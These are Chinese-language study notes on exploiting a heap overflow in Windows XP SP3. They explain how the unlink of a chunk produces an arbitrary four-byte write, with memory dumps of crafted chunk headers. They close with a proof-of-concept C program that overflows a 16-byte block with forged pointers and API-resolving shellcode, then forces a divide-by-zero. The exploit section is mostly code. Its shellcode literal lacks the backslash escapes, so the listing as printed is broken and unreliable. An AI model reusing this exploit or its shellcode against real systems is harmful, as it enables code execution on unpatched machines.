只是笔记························································
下面环境为 XP sp3 VC6.0 RELEASE
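#include <windows.h>

/*
 * Debugging scaffold for the notes that follow: create a private heap
 * (initial commit 0x1000, maximum size 0x10000) and take one 16-byte
 * zeroed allocation from it, so the chunk-insertion path walked through
 * below can be observed under a debugger.
 *
 * Returns 0 on success, 1 if the heap or the allocation could not be
 * created. The original listing did not check either call, so a failed
 * HeapCreate would have been passed on as a NULL heap handle.
 */
int main(void)
{
    HLOCAL h1 = 0;
    HANDLE hp;

    hp = HeapCreate(0, 0x1000, 0x10000);
    if (hp == NULL) {
        return 1;
    }

    h1 = HeapAlloc(hp, HEAP_ZERO_MEMORY, 0x10);
    if (h1 == NULL) {
        HeapDestroy(hp);
        return 1;
    }

    /* No per-block HeapFree needed: HeapDestroy releases the whole heap. */
    HeapDestroy(hp);
    return 0;
}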
下面介绍 XP 下 chunk 插入链表的过程:
执行完 HeapCreate 后
开始拆卸链表:
接着开始关键部分:
到这里，新 chunk 插入过程的关键部分也就结束了。
总结:
[新chunk->flink] = 旧chunk->flink
[新chunk->blink] = 旧chunk->blink
[ 旧chunk->blink->flink ] = 新chunk
[旧chunk->blink] = 新chunk
实际上是造成了一个向任意地址写入固定值的漏洞，即 dword shoot。
下面是正常情况的反映。
003A0688 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
003A0698 2D 01 03 00 00 10 00 00 78 01 3A 00 78 01 3A 00 -....x:.x:.
003A06A8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
003A06B8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
003A06C8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
003A06D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
003A06E8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
003A0698 03 00 03 00 8F 01 08 00 00 00 00 00 00 00 00 00 ..?.........
003A06A8 00 00 00 00 00 00 00 00 2A 01 03 00 00 10 00 00 ........*....
003A06B8 78 01 3A 00 78 01 3A 00 00 00 00 00 00 00 00 00 x:.x:.........
003A06C8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
003A06D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
003A06E8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
[0x003a0638+4] = 0x0012ffe4
[0x0012ffe4] = 0x003a06b8
[0x003a06eb+4] = 0x003906b8
003A0688 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 悙悙悙悙悙悙悙悙
003A0698 10 01 10 00 99 99 99 99 EB 06 3A 00 EB 06 3A 00
.櫃櫃?:.?:.
003A06A8 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 悙悙悙悙悙悙悙悙
003A06B8 90 90 90 90 90 90 90 90 EB 31 90 90 90 90 90 90 悙悙悙悙?悙悙悙
003A06C8 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 悙悙悙悙悙悙悙悙
003A06D8 90 90 90 90 90 90 90 90 90 90 90 11 01 10 00 99 悙悙悙悙悙?.
003A06E8 99 99 99 8C 06 3A 00 E4 FF 12 00
003A06B8 /EB 06 jmp X003A06C0 003A06BA |3A00 cmp al,byte ptr ds:[eax] 003A06BC |E4 FF in al,0xFF 003A06BE |1200 adc al,byte ptr ds:[eax] 003A06C0 EB 31 jmp X003A06F3 //而这个的EB 31 是我们故意设置的跳转
#include <stdio.h>
#include <windows.h>

/*
 * Proof-of-concept listing for the notes above (XP SP3, VC6.0 Release).
 * The buffer below is copied over a 16-byte heap block, and the second
 * HeapAlloc then runs the chunk-unlink sequence summarised earlier
 * ([new->flink] = old->flink ... [old->blink] = new) on crafted chunk
 * headers. Compare with the memory dump at 003A0688 above; the two are
 * not byte-for-byte identical.
 */
char shellcode[]=
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x10x01x10x00x99x99x99x99"
    "xEBx06x3ax00xEBx06x3ax00"
    "x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "xEBx31x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
    "x90x90x90x90x90x90x90x90x90x90x90"
    "x11x01x10x00x99x99x99x99x8Cx06x3ax00xb4xFFx12x00"
    "x90x90x90x90"
    "xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
    "x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
    "x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
    "x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
    "xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
    "x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
    "xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
    "xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
    "x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
    "x53"
    "x68x64x61x30x23"
    "x68x23x50x61x6E"
    "x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8";

/* Non-standard signature (C requires int main); kept as in the original. */
void main()
{
    HLOCAL h1,h2;
    HANDLE hp;

    /* Return value is not checked; a NULL heap handle would reach HeapAlloc. */
    hp = HeapCreate(0,0x1000,0x10000);
    // __asm int 3
    h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
    /* 300 bytes into a 16-byte block: this is the heap overflow the notes analyse. */
    memcpy(h1,shellcode,300);
    /* The allocation whose chunk insertion performs the writes listed above. */
    h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,16);
    /* Deliberate integer division by zero (undefined behaviour in C);
       the notes do not explain its role. */
    int zero=0;
    zero=1/zero;
    printf("%d",zero);
}